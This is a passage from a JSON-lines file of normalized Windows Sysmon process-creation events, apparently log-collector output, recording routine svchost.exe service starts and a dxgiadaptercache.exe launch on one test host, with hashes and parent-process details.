22:19:17.546\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001031250100}\"},{\"Name\":\"ProcessId\",\"text\":\"1920\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001031250100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1920", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.546Z", "type": "raw", "uuid": "97d92ca4-c4ef-4894-aba9-8146d64131a7"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6420355Z\"},\"EventRecordID\":\"27535\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.543\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00109b240100}\"},{\"Name\":\"ProcessId\",\"text\":\"1912\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s FontCache\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s FontCache", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00109b240100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1912", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.543Z", "type": "raw", "uuid": "b4f762b5-ddd6-4873-a4f2-e6b3aa738386"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6352814Z\"},\"EventRecordID\":\"27528\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.513\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010831f0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1876\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\dxgiadaptercache.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"DXGI Adapter Cache\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"DXGIAdapterCache.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\dxgiadaptercache.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=898AD000DF8317837B5CF97FA32509739346EDDB,MD5=CEA17E28EFF3B2EED6B49B5DDCC7327F,SHA256=BA598EFD9D9C4449DEAC83F78CEC893AA127F31767902D6DD69A157B65450240,IMPHASH=88A45A1AD2822D23AF808E0A0C8194B7\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010a5d20000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"1104\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\dxgiadaptercache.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dxgiadaptercache.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010831f0100", "object.process.hash.imphash": "88A45A1AD2822D23AF808E0A0C8194B7", "object.process.hash.md5": "CEA17E28EFF3B2EED6B49B5DDCC7327F", "object.process.hash.sha1": "898AD000DF8317837B5CF97FA32509739346EDDB", "object.process.hash.sha256": "BA598EFD9D9C4449DEAC83F78CEC893AA127F31767902D6DD69A157B65450240", "object.process.id": "1876", "object.process.meta": "Description:DXGI Adapter Cache | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dxgiadaptercache.exe", "object.process.original_name": "DXGIAdapterCache.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010a5d20000", "object.process.parent.id": "1104", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.513Z", "type": "raw", "uuid": "ad832f04-aefb-46bd-a850-e5c12410e8e6"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6326837Z\"},\"EventRecordID\":\"27524\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.476\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001028190100}\"},{\"Name\":\"ProcessId\",\"text\":\"1780\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s SENS\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s SENS", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001028190100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1780", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.476Z", "type": "raw", "uuid": "e13c80d2-c883-45aa-b3e8-1894a5277acd"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5580910Z\"},\"EventRecordID\":\"27506\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.430\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00102b0f0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1676\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalService -p -s netprofm\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalService -p -s netprofm", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00102b0f0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1676", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.430Z", "type": "raw", "uuid": "bdc02f7b-8b53-4f06-9f6f-709763f9c3ae"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5421094Z\"},\"EventRecordID\":\"27502\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.402\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010ea0a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1640\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs -p -s Themes\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s Themes", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010ea0a0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", 